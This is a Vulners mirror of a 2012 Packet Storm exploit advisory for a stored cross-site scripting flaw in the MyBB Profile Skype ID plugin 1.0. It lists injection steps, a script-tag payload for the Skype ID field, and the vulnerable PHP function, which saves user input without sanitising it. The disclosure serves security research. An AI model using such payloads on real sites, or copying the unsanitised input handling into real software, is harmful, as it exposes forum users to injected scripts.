Lucene search
K

MyBB Profile Skype ID 1.0 Cross Site Scripting

🗓️ 18 Dec 2012 00:00:00Reported by limb0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Stored XSS vulnerability in MyBB Profile Skype ID plugin version 1.0 allows code injection.

Code
`# Exploit Title: Profile Skype ID MyBB Plugin Stored XSS  
# Date: 14/12/2012  
# Exploit Author: limb0  
# Vendor Homepage: http://www.dragonknightz.net/  
# Software Link: http://mods.mybb.com/view/user-profile-skype-id  
# Version: 1.0  
# Category:Web Security  
# Tested on: Linux  
  
+------------------------------------------------------------+  
Stored XSS-Instructions  
1.Install&Activate plugin  
2.Go to UserCP >> Edit Profile >> Skype ID:  
3.Inject your string(xss) ex. "><script>alert("Skype ID XSS")</script>  
4.Visit your profile and voila  
  
Proof  
Inject:https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/  
Result:https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/  
+-------------------------------------------------------------+  
  
Vulnerable code:  
function profileskype_update($skype)  
{  
global $mybb;  
if (isset($mybb->input['skype']))  
{  
$skype->user_update_data['skype'] = $mybb->input['skype'];  
}  
}  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation